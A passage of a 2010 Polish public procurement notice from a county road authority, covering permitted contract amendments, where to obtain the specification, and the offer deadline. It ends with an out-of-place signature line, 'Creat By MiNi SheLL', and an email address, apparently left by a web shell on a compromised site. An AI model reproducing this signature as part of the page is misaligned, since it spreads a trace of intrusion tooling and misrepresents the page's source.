6)	odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
7)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;
8)	 konieczność usunięcia sprzeczności w dokumentacji w przypadku niemożności usunięcia sprzeczności przy pomocy wykładni, w szczególności gdy sprzeczne zapisy mają równy stopień pierwszeństwa 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt II możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiany lokalizacji budowanych urządzeń. 
3.	Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ, według polityki kadrowej Wykonawcy;
2)	zmiana osób podanych w ofercie wykonawcy przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy (zmiana jest możliwa na osoby spełniające wymogi SIWZ, a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę);
3)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
4)	zmiana obowiązującej stawki VAT;
5)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
6)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
7)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami (W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie lub usunięcie kolizji.);
8)	zmiany uzasadnione okolicznościami, o których mowa w art. 3571 §1 Kodeksu cywilnego;
9)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.
	W przypadku wystąpienia okoliczności wymienionych wyżej, możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót, jak również zmiana lokalizacji budowanych urządzeń.
	W przypadku określonym w pkt 4, zmiana stawki VAT dotyczyć będzie ceny kontraktowej, w części, jakiej dotyczą te zmiany przepisów.
	W przypadku pkt 5, zmiany dostosują sposób rozliczeń lub płatności do wymogów zmienionej umowy o dofinansowanie projektu lub nowych wytycznych dotyczących realizacji projektu.
	W przypadku pkt 6, zmiany mogą  dotyczyć zakresu wykonywanych prac, zmian dokumentacji i zmniejszenia wynagrodzenia o kwoty odpowiadające cenie robót, z których Zamawiający rezygnuje.
	Zmiana wynagrodzenia Wykonawcy jest możliwa w przypadkach wskazanych wyżej, na zasadach określonych w warunkach umowy. 
	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdp.powiatdrawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Drawsku Pomorskim
Ul. Złocieniecka 22a
78-500 Drawsko Pom.
pokój nr 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2010 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Drawsku Pomorskim
Ul. Złocieniecka 22a
78-500 Drawsko Pom.
pokój nr 25-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com